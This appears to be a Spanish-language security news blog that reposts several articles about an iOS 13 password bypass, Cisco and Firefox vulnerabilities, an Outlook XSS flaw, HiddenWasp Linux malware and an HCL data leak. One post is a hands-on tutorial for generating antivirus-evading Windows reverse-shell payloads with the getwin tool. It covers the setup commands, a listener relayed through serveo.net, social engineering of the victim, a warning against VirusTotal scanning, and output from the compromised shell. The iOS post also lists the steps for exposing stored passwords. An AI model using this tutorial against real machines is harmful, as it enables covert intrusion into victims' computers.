Mobile Security

VULNERABILIDAD EN IOS 13 PERMITE ACCESO A LAS CONTRASEÑAS GUARDADAS EN UN IPHONE

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/vulnerabilidad-en-ios-13-permite-acceso-a-las-contrasenas-guardadas-en-un-iphone/

Especialistas en seguridad de aplicaciones web han reportado el hallazgo de una vulnerabilidad en la versión beta de iOS 13, el nuevo sistema operativo de Apple, que, de ser explotada, brinda a los actores de amenazas acceso completo a las contraseñas, direcciones email y cualquier dato de inicio de sesión almacenado por la función ‘Autocompletar’.

Debido a que esta versión del sistema operativo aún está en etapas de prueba, la vulnerabilidad no cuenta con gran alcance, afectando sólo a los usuarios participantes de la prueba pública de esta versión beta.

Acorde a los expertos en seguridad de aplicaciones web, la vulnerabilidad proporciona a los hackers acceso a todos los datos almacenados en iCloud Keychain, el sistema de gestión de contraseñas de Apple, de donde obtiene la información la función ‘Autocompletar’. Para obtener la información, los atacantes simplemente deben:

  • Ir a Configuración
  • Elegir la opción Contraseñas y Cuentas
  • Seleccionar repetidamente Contraseñas de Sitios Web y Apps

Al hacer esto, se cancelará la aparición del mensaje del sistema de seguridad Face ID/Touch ID y, después de otros intentos más, el atacante obtendrá acceso a todos los nombres de usuario y contraseñas almacenadas en el sistema; finalmente, el actor de amenazas incluso puede realizar modificaciones en las credenciales de acceso comprometidas.

Es importante destacar que la explotación de la vulnerabilidad requiere acceso físico a un iPhone o iPad desbloqueado, por lo que la complejidad del ataque aumenta considerablemente, afirman los especialistas en seguridad de aplicaciones web. La compañía ya ha sido notificada sobre la existencia de esta falla, por lo que es altamente probable que la compañía solucione esta falla en la próxima versión de la beta de iOS 13 y de iPadOS 13.

Los especialistas del Instituto Internacional de Seguridad Cibernética (IICS) mencionan que esta versión del sistema operativo incluye múltiples mejoras y nuevas funciones para mejorar la experiencia de privacidad de los usuarios de Apple.

Aunque el error es serio, pues expone una gran cantidad de información confidencial, la compañía está a tiempo de implementar las medidas necesarias para corregir esta y otras fallas que sean descubiertas por los usuarios de la versión beta de iOS 13.

Advertisements

CÓMO CREAR CARGAS ÚTILES COMPLETAMENTE INDETECTABLES PARA WINDOWS 10

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/tutoriales/como-crear-cargas-utiles-completamente-indetectables-para-windows-10/

Los hackers aman el shell de Windows. Existen múltiples cargas útiles para evadir el mecanismo de seguridad de este sistema operativo y, acorde a especialistas en hacking éticodel Instituto Internacional de Seguridad Cibernética (IICS), estas cargas están bien codificadas para obtener las sesiones de Windows. Hay diversos métodos para obtener el reverse shell, hoy analizaremos getwin, empleada para crear la carga útil y el listener de Win32.

Nota: La carga útil generada por esta herramienta es totalmente indetectable (FUD) para la herramienta Windows 10 Defender. No analice la carga útil generada con la herramienta virustotal.com

La herramienta no necesita ninguna configuración, no es necesario configurar el reenvío de puertos o instalar otros programas. Vea la demostración en el siguiente video:

  • Para propósitos de prueba, en el lado del atacante usaremos Kali Linux 2018.4 amd64 y en el lado de la víctima usaremos Windows 10 1809
  • Abra el terminal y escriba git clone https://github.com/thelinuxchoice/getwin.git
  • Luego escriba cd getwin y escriba chmod u + x getwin.sh
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
 Cloning into 'getwin'…
 remote: Enumerating objects: 46, done.
 remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
 Unpacking objects: 100% (46/46), done.
 root@kali:/home/iicybersecurity/Downloads# cd getwin/
 root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls
 getwin.sh  icon  LICENSE  README.md
  • Escriba ./getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
     _______                _  _  _  _
    (_______)          _   (_)(_)(_)(_)
     _   ___  _____  _| |_  _  _  _  _  ____
    | | (_  || ___ |(_   _)| || || || ||  _ \
    | |___) || ____|  | |_ | || || || || | | |
     \_____/ |_____)   \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.
        .:.: Coded by:@linux_choice :.:.

     :: Warning: Attacking targets without  ::
     :: prior mutual consent is illegal!    ::
  • Una vez que la herramienta haya comenzado, presione enter para establecer el puerto predeterminado. Luego ingrese el nombre de la carga útil (test01) y seleccione el icono
 [*] Choose a Port (Default: 4098 ):
 [*] Payload name (Default: payload ): test01
 [] Put ICON path (Default: icon/messenger.ico ): [] Compiling…
 [] Saved: test01.exe [!] Please, don't upload to virustotal.com ! [] Starting server…
 [*] Send the first link above to target + /test01.exe:
 Forwarding HTTP traffic from https://ludius.serveo.net
 Forwarding TCP connections from serveo.net:2119
 [*] Waiting connection…
 listening on [any] 1547 …
  • Como puede ver, la conexión del listener ha comenzado. Ahora puede utilizar cualquier variante de ingeniería social para ejecutar la carga útil en la computadora de la víctima
  • Para las pruebas usaremos Windows 10 1809 con Windows Defender habilitado
    • Así que ahora vamos a ejecutar la carga útil en un sistema operativo Windows 10
    • Después de crear la carga útil (test01.exe), ejecute la carga útil (test01.exe). Simplemente haga doble clic en el ejecutable
    • Al hacer doble clic en la carga útil (test01.exe) se creará una sesión entre la víctima y la máquina objetivo y obtendrá el shell de Windows
    • Herramientas como esta son parte de los cursos de hacking ético ofrecidos por el Instituto Internacional de Seguridad Cibernética (IICS)

    No suba la carga útil generada a virustotal.com

    [*] Waiting connection…
     listening on [any] 4342 …
     connect to [127.0.0.1] from localhost [127.0.0.1] 43878
     TCP connection from 27.4.174.190 on port 3352
     Microsoft Windows [Version 10.0.17758.1]
     (c) 2018 Microsoft Corporation. All rights reserved.
     E:>C:
     C:
     C:>ipconfig
     ipconfig
     Windows IP Configuration
     Ethernet adapter Ethernet0:
     Connection-specific DNS Suffix  . :
        Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
        IPv4 Address. . . . . . . . . . . : 192.168.1.5
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : fe80::1%13
                                            192.168.1.1
    C:>getmac
     getmac
     Physical Address    Transport Name
     =================== ==========================================================
     ##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}
    
    (For security reasons we have hide the MAC address)
    • Ahora el atacante puede cambiar o ver cualquier archivo de la computadora objetivo con Windows 10

CISCO DNA PERMITIÓ A USUARIOS NO AUTORIZADOS ACCESO A REDES EMPRESARIALES POR LARGO TIEMPO

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/cisco-dna-permitio-a-usuarios-no-autorizados-acceso-a-redes-empresariales-por-largo-tiempo/

Especialistas en auditorías de sistemas reportan una vulnerabilidad crítica en el Centro de Arquitectura de Red Digital (DNA) de Cisco que, de ser explotada, podría permitir que un actor de amenazas sin autenticación acceda a los servicios críticos internos del sistema.

En realidad la compañía lanzó 25 actualizaciones diferentes para varios de sus productos. Dos de los parches corrigen vulnerabilidades críticas, siete son errores de alto impacto y las fallas restantes son de severidad media. La vulnerabilidad que los expertos consideran más grave, CVE-2019-1848, existe debido a una restricción insuficiente en el acceso a los puertos necesarios para la operación del sistema del DNA de Cisco, que sirve para administrar y corregir errores de red. La vulnerabilidad ha recibido un puntaje de 9.3/10 en la escala del Common Vulnerability Scoring System (CVSS).

Los expertos en auditorías de sistemas afirman que esta vulnerabilidad podría ser explotada conectando un dispositivo no autorizado a la red. Las versiones de Cisco DNA impactadas son todas las anteriores a 1.3, por lo que los administradores de sistemas deberán actualizar a una versión segura.

Cisco SD-WAN, la arquitectura en la nube de la compañía, también tuvo que ser actualizada, pues presentaba severas fallas de seguridad. La más grave de estas fallas, identificada como CVE-2019-1625, es una vulnerabilidad de escalada de privilegios en la interfaz de línea de comandos de SD-WAN. Según los especialistas en auditorías de sistemas, la vulnerabilidad existe debido a una insuficiente autorización en CLI, por lo que los hackers podrían autenticarse en un dispositivo para ejecutar comandos arbitrarios y ganar altos privilegios. La vulnerabilidad impacta a la mayoría de las soluciones de Cisco que ejecutan una versión de SD-WAN anterior a 18.3.6, principalmente enrutadores para entornos industriales.

Otras dos vulnerabilidades críticas fueron encontradas en SD-WAN. CVE-2019-1624 permite que los hackers inyecten código arbitrario con privilegios de usuario root. Por otra parte, CVE-2019-1626 también existe en la interfaz web de usuario de SD-WAN y podría permitir que un hacker remoto obtenga privilegios elevados en un dispositivo Cisco vManage comprometido.

Acorde a especialistas del Instituto Internacional de Seguridad Cibernética (IICS), no existen pruebas de algún intento de explotación en escenarios reales de las vulnerabilidades corregidas, no obstante, los administradores deben actualizar sus sistemas a la brevedad.

OTRA VULNERABILIDAD DÍA CERO EN MOZILLA FIREFOX ESTÁ CAUSANDO PROBLEMAS PARA LOS USUARIOS

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/vulnerabilidades/otra-vulnerabilidad-dia-cero-en-mozilla-firefox-esta-causando-problemas-para-los-usuarios/

Acorde a especialistas en auditoría de seguridad informática Mozilla ha vuelto a corregir su navegador Firefox por segunda vez esta semana luego de recibir una alerta sobre una campaña de spear phishing dirigida contra los usuarios de la plataforma de intercambio de criptomonedas Coinbase.

Según los reportes, un grupo de hackers ha dirigido algunos correos electrónicos de phishingcontra el personal de Coinbase, estos mensajes contienen enlaces a sitios web maliciosos. Si el usuario cae en el juego de los hackers y hace clic en alguno de estos enlaces usando Firefox, un malware se descargaría y ejecutaría de forma automática en el sistema. Acorde a los expertos en auditoría de seguridad informática, este malware es capaz de robar contraseñas desde el navegador, entre otros datos confidenciales.

Los encargados de ingeniería de Firefox comentaron recientemente: “Coinbase reportó una vulnerabilidad explotada para dirigir una campaña de phishing en su contra; la falla fue corregida menos de un día después de que Mozilla recibió el reporte”. La versión 67.0.4 de Firefox contiene correcciones para una otra vulnerabilidad día cero que funciona como un escape del sandbox cuando la falla es explotada.

El objetivo del hacker era entrar en las redes de Coinbase para robar direcciones de cartera en línea de criptomoneda, reportan los expertos en auditoría de seguridad informática. No obstante, el personal de la plataforma de intercambio logró bloquear los intentos de los hackers, además, la actualización lanzada por Mozilla reduce casi por completo las posibilidades de ataque por esta vía.

Acorde a los especialistas del Instituto Internacional de Seguridad Cibernética (IICS), los ataques en Coinbase habrían comenzado semanas antes de que el personal de la plataforma lograra detectarlos.  Coinbase aún no he mencionado cómo es que los hackers descubrieron estas fallas de seguridad.

Los ataques explotando esta falla no sólo ocurrieron en Coinbase, otras plataformas de intercambio de criptomoneda también fueron atacadas recientemente, aunque no son hechos necesariamente relacionados. Lo más recomendable para los usuarios de Firefox es comprobar la versión del navegador que están utilizando y, de ser necesario, instalar las actualizaciones.

APLICACIÓN DE OUTLOOK PODRÍA PERMITIR QUE UN HACKER ENTREN EN SU SMARTPHONE ANDROID

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/seguridad-movil/aplicacion-de-outlook-podria-permitir-que-un-hacker-entren-en-su-smartphone-android/

Microsoft acaba de lanzar una versión actualizada de la app de Outlook para Android que, acorde a los especialistas en seguridad informática corrige una falla de seguridad de severidad considerable. La app de correo electrónico cuenta con alrededor de 100 millones de usuarios activos.

En un reporte de seguridad, Microsoft informa que la aplicación de Outlook versión 3.0.88 y anteriores contiene una vulnerabilidad de secuenciad de comandos entre sitios (XSS) identificada como CVE-2019-1105. La falla existe debido a la forma en la que la app analiza los correos electrónicos entrantes.

De acuerdo con los expertos en seguridad informática del IICS, de ser explotada, la vulnerabilidad puede ayudar a un actor de amenazas remoto a ejecutar código malicioso del lado del cliente en el dispositivo objetivo, el hacker sólo requiere enviar un correo electrónico especialmente diseñado.

“Después de explotar de forma exitosa esta vulnerabilidad, un hacker podría realizar ataques XSS en los sistemas comprometidos ejecutando scripts en el contexto de seguridad de cualquier usuario”, menciona el reporte de Microsoft.

Según el equipo de seguridad informática de la compañía, la vulnerabilidad fue descubierta por un grupo de investigadores independientes que notificó a la compañía siguiendo el debido procedimiento para el informe de vulnerabilidades. Los expertos que descubrieron la falla reportaron que ésta podría conducir a un ataque de suplantación de identidad.

Aún no están disponibles los detalles sobre el ataque o una prueba de concepto para la vulnerabilidad, asimismo, Microsoft informó que no cuenta con evidencia que demuestre que este ataque ha sido concretado en escenarios reales.

Especialistas del Instituto Internacional de Seguridad Cibernética (IICS) recomiendan a los usuarios de Outlook para Android verificar si su app se ha actualizado de forma automática. En caso contrario, el usuario deberá instalar la actualización manualmente desde la plataforma oficial de Google Play Store.

Múltiples vulnerabilidades día cero han sido reportadas recientemente en diversos productos de Microsoft, principalmente Windows 10. La investigadora conocida como Sandbox Escaper ha reportado al menos cinco errores de seguridad nuevos durante los últimos seis meses en servicios como Remote Desktop, Windows Server y Windows 10 Sandbox.

HIDDENWASP, UN PELIGROSO MALWARE QUE AFECTA SISTEMAS LINUX

Posted on

ORIGINAL CONTENT: https://noticiasseguridad.com/malware-virus/hiddenwasp-un-peligroso-malware-que-afecta-sistemas-linux/

A pesar de que no son poco comunes, especialistas en seguridad en redes mencionan que los riesgos de seguridad presentes en sistemas Linux no son tratados de forma suficientemente amplia. Ya sea por su naturaleza poco ofensiva o porque los mecanismos de seguridad de estos sistemas los pasan por alto, estas amenazas de seguridad no reciben tanta difusión como las que impactan a los sistemas Windows.

No obstante, se ha vuelto algo común detectar malware con capacidades de evasión altamente desarrolladas utilizando código abierto ya existente presente en algunas implementaciones más allá de los sistemas Windows. La firma de seguridad en redes Intezer ha reportado recientemente el hallazgo de una nueva variante de malware conocida como HiddenWasp.

Acorde a los especialistas de la compañía, HiddenWasp es una amenaza de ciberseguridad que debe ser atendida pues, después de algunos análisis, se ha concluido que cuenta con una tasa de detección del 0% en los sistemas de detección de malware más utilizados en el mundo.

Acorde a los expertos en seguridad en redes, la infección del malware de Linux HiddenWasp requiere la ejecución de un script inicial. En la investigación, los expertos descubrieron que el script se vale de un usuario llamado ‘sftp’ con una contraseña bastante segura; además, el script limpia el sistema para deshacerse de versiones anteriores del malware en caso de que una infección se hubiera presentado anteriormente.

Posteriormente, se descarga un archivo en la máquina comprometida desde el servidor que contiene todos los componentes, incluyendo el troyano y el rootkit. El script también agrega un binario troyano en la ubicación /etc/rc.local para funcionar incluso después de hacer reboot en el sistema.

Los especialistas del Instituto Internacional de Seguridad Cibernética (IICS) han encontrado diversas similitudes entre el rootkit de HiddenWasp y el del malware Azazel, además de compartir algunos fragmentos de cadena con el malware ChinaZ y el de la botnet Mirai. “Gracias a HiddenWasp, los hackers pueden ejecutar comandos en el terminal de Linux, ejecutar archivos, descargar scripts adicionales, y más”, agregan los expertos.

A pesar de que la investigación logró algunos hallazgos, los expertos aún desconocen el vector de ataque empleado por los hackers para infectar los sistemas Linux, aunque una versión posible es que los atacantes hayan desplegado el malware desde algunos sistemas que ya se encontraban bajo su control. “HiddenWasp podría tratarse de una segunda etapa de ataque”, concluyeron los expertos.

BRECHA DE DATOS EXPONE INFORMACIÓN CONFIDENCIAL EN HCL, COMPAÑÍA DE TI

Posted on

CONTENIDO ORIGINAL: https://noticiasseguridad.com/hacking-incidentes/brecha-de-datos-expone-informacion-confidencial-en-hcl-compania-de-ti/

Especialistas en auditoría informática reportan que HCL, importante compañía de servicios de TI, dejó expuestas en línea las contraseñas de sus empleados, entre otros datos, como información confidencial relacionada con proyectos de sus clientes.

Según los reportes, un portal en línea del área de recursos humanos de la compañía expuso nombres de empleados de reciente ingreso, nombres de usuario en la plataforma y contraseñas en texto simple. Acorde a la compañía, el sitio se mantuvo activo durante la exposición de los datos, comprometiendo los accesos de alrededor de 54 empleados.

El perfil completo de los empleados comprometidos incluye información como:

  • Nombre completo del empleado
  • Número telefónico
  • Fecha de ingreso a la compañía
  • Código SAP del reclutador

Los datos expuestos podrían haber sido empleados por hackers maliciosos para iniciar sesión en los sistemas de la compañía, acceder a sistemas sensibles e incluso tomar control de las cuentas de email de los empleados para desplegar campañas de phishing contra otros empleados, comentan los expertos en auditoría informática

Este incidente pudo haber expuesto propiedad intelectual confidencial tanto de la compañía como de sus clientes; regularmente, esta información es tratada como secreto comercial, por lo que el acceso a la información resguardada por HCL puede ser realmente útil para clientes y competidores.

Un portavoz de la compañía declaró: “En HCL nos tomamos muy en serio la seguridad de la información. Apenas descubrimos este incidente de seguridad, tomamos las medidas pertinentes para resolver el problema a la brevedad. Además, nuestros equipos de seguridad realizarán una revisión exhaustiva para saber qué pasó exactamente y prevenir que vuelva a ocurrir.

Acorde a los especialistas en auditoría informática, SmartManage, un portal de HCL para compartir información sobre proyectos de la compañía con sus clientes también fue comprometido, exponiendo información como:

  • Análisis internos
  • Informes de productividad
  • Informes de instalaciones de software

Recientemente, especialistas del Instituto Internacional de Seguridad Cibernética (IICS) reportaron un serio incidente de seguridad en Wipro, uno de los mayores competidores de HCL; durante este incidente, los hackers se apoderaron de los sistemas de Wipro para lanzar ataques contra algunos de los clientes de la compañía. Por ahora no existe evidencia para probar que algo similar sucedió en HCL, aunque la posibilidad no debe ser descartada.